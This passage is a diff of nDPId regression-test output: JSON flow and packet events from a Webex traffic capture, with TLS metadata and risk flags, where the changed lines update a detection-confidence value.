-01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570713719,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570713719,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570713719,"pkt":"ABoRAAACABoRAAABCABFAAA8m55AAEAG1oYKCAABUEpuRIMXAbuTJntGAAAAAKACOQjR\/QAAAgQFtAQCCAoATODYAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1444570713727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713727,"pkt":"ABoRAAACABoRAAABCABFAAAoA8NAABAGnnZQSm5ECggAAQG7gxds2YS5kyZ7R1AS\/\/9iaAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1444570713730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713730,"pkt":"ABoRAAACABoRAAABCABFAAAom59AAEAG1pkKCAABUEpuRIMXAbuTJntHbNmEulAQOQgpYQAA"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570716599,"flow_last_seen":1444570716599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570716599,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1444570716599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570716599,"pkt":"ABoRAAACABoRAAABCABFAAA8ldZAAEAGdtEKCAABPm3lnsqRAbsgVHeCAAAAAKACOQiaIAAAAgQFtAQCCAoATOJUAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1444570716603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716603,"pkt":"ABoRAAACABoRAAABCABFAAAoA9FAABAGOOs+beWeCggAAQG7ypHfq4h9IFR3g1AS\/\/+1cAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1444570716604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716604,"pkt":"ABoRAAACABoRAAABCABFAAAolddAAEAGduQKCAABPm3lnsqRAbsgVHeD36uIflAQOQh8aQAA"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570718801,"flow_last_seen":1444570718801,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1444570718801,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1444570718801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718801,"pkt":"ABoRAAACABoRAAABCABFAAAk4zFAAEARKYMKCAABPm3lnso8IygAEONTAQAAAAAAAAE="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1444570718921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718921,"pkt":"ABoRAAACABoRAAABCABFAAAkA95AABARONc+beWeCggAASMoyjwAEESbAgAAAAC4nQE="} @@ -307,7 +307,7 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1444570732086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570732086,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/tAAEAGidIKCAABPm3geMf2AbvHvWEvAAAAAKACOQgMSwAAAgQFtAQCCAoATObUAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1444570732090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570732090,"pkt":"ABoRAAACABoRAAABCABFAAAoA+tAABAGPfc+beB4CggAAQG7x\/Y4Qp7Qx71hMFAS\/\/+9MQAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1444570733095,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570733095,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/xAAEAGidEKCAABPm3geMf2AbvHvWEvAAAAAKACOQgL5wAAAgQFtAQCCAoATOc4AAAAAAEDAwY="} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738415,"flow_last_seen":1444570738415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738415,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1444570738415,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738415,"pkt":"ABoRAAACABoRAAABCABFAAA8pZ5AAEAGbC8KCAABPm3geMf6AbsEHk9CAAAAAKACOQjdywAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1444570738418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738418,"pkt":"ABoRAAACABoRAAABCABFAAAoA+9AABAGPfM+beB4CggAAQG7x\/r74bC9BB5PQ1AS\/\/+9LQAA"} @@ -316,70 +316,70 @@ 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1444570738422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoA\/BAABAGPfI+beB4CggAAQG7x\/s\/nm3KwGGSNlAS\/\/+9LAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAopZ9AAEAGbEIKCAABPm3geMf6AbsEHk9D++GwvlAQOQiEJgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoeOpAAEAGmPcKCAABPm3geMf7AbvAYZI2P55ty1AQOQiEJQAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 